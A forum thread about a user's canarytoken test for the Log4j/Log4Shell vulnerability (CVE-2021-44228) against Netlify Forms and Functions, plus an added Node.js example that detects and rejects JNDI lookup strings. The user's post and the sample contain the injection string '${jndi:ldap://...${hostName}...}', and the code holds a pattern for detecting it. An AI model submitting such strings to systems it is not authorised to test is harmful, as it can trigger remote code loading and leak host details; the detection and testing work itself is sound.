Netlify Forms Submission and Lambda Functions and Log4j Vulnerability CVE-2021-44228

Hello,

I have a custom form on my website and a webhook which triggers a lambda function. I used https://canarytokens.org/ to test/verify the log4shell vulnerability, and when the data is submitted via Netlify Forms and the lambda function is called, the token was activated.

Note: Our lambda function in Netlify doesn't post the data to any external system and it's entirely in NodeJS.

We have followed this tutorial here: https://twitter.com/ThinkstCanary/status/1469439743905697797
and used some form fields that are posted to Netlify, and we have noticed that the token DNS query was made.

Thanks

Hi @luksdev

Are you suggesting that Netlify Forms/Netlify Functions are susceptible to log4j?

Hello @coelmay,

I am not sure, but as my lambda function is not using any external service, only Netlify Forms and Netlify Forms webhooks/notifications, I am trying to understand where/which service is doing the query to the canary DNS.

To understand more here is the tutorial: Using a Canarytoken to help test for CVE-2021-44228 (log4j/log4shell) – Thinkst Canary

I have submitted my forms and replaced the fields like name and text with the JNDI string ${jndi:ldap://x${hostName}.L4J. INSERT-COPIED-STRING-HERE /a}, and the token received a DNS query, meaning that someone did query that token. So I am wondering who/where the problem is.

I have contacted Netlify and have the full report with the IP but didn't receive an answer yet.
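The thread describes a canarytoken JNDI string placed into form fields and passed to a Netlify Function webhook. The following is an added example, not code from the thread or from Netlify, showing how such a Node.js function can detect and refuse submissions carrying a Log4Shell-style lookup string before any downstream processing; the payload shape and field names are assumptions constructed for the demo.

```javascript
// Added example (not Netlify's code): flag Log4Shell-style JNDI lookup
// strings in a Netlify Forms webhook payload before the function acts on it.

// Matches a `${jndi:...}` lookup. Nested `${...}` expressions such as the
// `${hostName}` seen in the thread still contain this prefix, so they match.
const JNDI_LOOKUP = /\$\{\s*jndi\s*:/i;

// The webhook POST body is a JSON string; submitted fields live under `data`
// (assumed shape for this demo). Returns the names of offending fields.
function findJndiFields(body) {
  const payload = JSON.parse(body);
  const fields = payload.data || {};
  const hits = [];
  for (const [name, value] of Object.entries(fields)) {
    if (typeof value === "string" && JNDI_LOOKUP.test(value)) {
      hits.push(name);
    }
  }
  return hits;
}

// Handler in the shape Netlify Functions expect (export it as `handler`).
// Rejected submissions are logged for review and not forwarded anywhere.
const handler = async (event) => {
  const hits = findJndiFields(event.body || "{}");
  if (hits.length > 0) {
    console.warn(`JNDI lookup string in form fields: ${hits.join(", ")}`);
    return { statusCode: 400, body: "rejected" };
  }
  return { statusCode: 200, body: "ok" };
};

// Constructed sample mirroring a canarytoken test submission; the token id
// is a placeholder, not a real one.
const SAMPLE_BODY = JSON.stringify({
  form_name: "contact",
  data: {
    name: "${jndi:ldap://x${hostName}.L4J.PLACEHOLDER-TOKEN-ID/a}",
    email: "user@example.com",
    message: "hello, ${hostName} is fine on its own",
  },
});
```

The check is deliberately narrow: it tells you which field carried the lookup string so the source of the DNS query can be traced, but it is not a substitute for patching or removing the vulnerable log4j instance wherever the fields are eventually logged.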

Hey there @luksdev

You can follow the conversation about log4j here. Our security team is investigating.

If you have questions about form functionality or believe there is an error, we can continue the conversation about your form. If not, please head over to the other thread.

Hello Hillary, due to the high risk of this issue, is it not possible for someone to advise and get in touch in this regard? I have all the logs, including the IP of the servers that triggered the DNS query against the ldap string from the canary token.


@luksdev check out Please Read: Regarding Log4j / Log4Shell vulnerability on Netlify's service and your sites for more information on Log4j and Netlify.


Thanks, @coelmay! @luksdev, please follow up in that thread if you have any further questions. We appreciate it!
